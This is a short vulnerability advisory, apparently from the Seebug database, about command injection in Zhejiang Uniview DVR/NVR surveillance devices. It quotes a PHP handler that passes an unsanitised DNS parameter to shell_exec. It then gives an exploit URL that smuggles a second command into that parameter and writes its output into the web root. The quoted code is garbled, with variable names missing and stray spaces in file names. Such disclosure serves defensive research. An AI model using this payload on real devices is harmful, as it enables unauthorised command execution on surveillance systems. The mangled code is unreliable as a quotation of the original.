Zhejiang uniview technologies security(DVR/NVR)and other monitoring equipment command execution

2016-06-22T00:00:00
ID SSV:91938
Type seebug
Reporter
Modified 2016-06-22T00:00:00

Description

In file /Interface/DevManage/VM.php in:

code area

`` .............. Code omitted....................

// Set the DNS to resolve the server address

case 'setDNSServer' :

 shell_exec('echo "nameserver '. ['DNSServerAdrr'].'"'.' > /etc/resolv. conf');

 ['Code'] = 0;

getTip();

 echo json_encode();

break;

 default :

showErrorRequest();

break;

........................... Code omitted.....................

``

On EXP:

`` code area

/Interface/DevManage/VM. php? cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/11.php %23"

``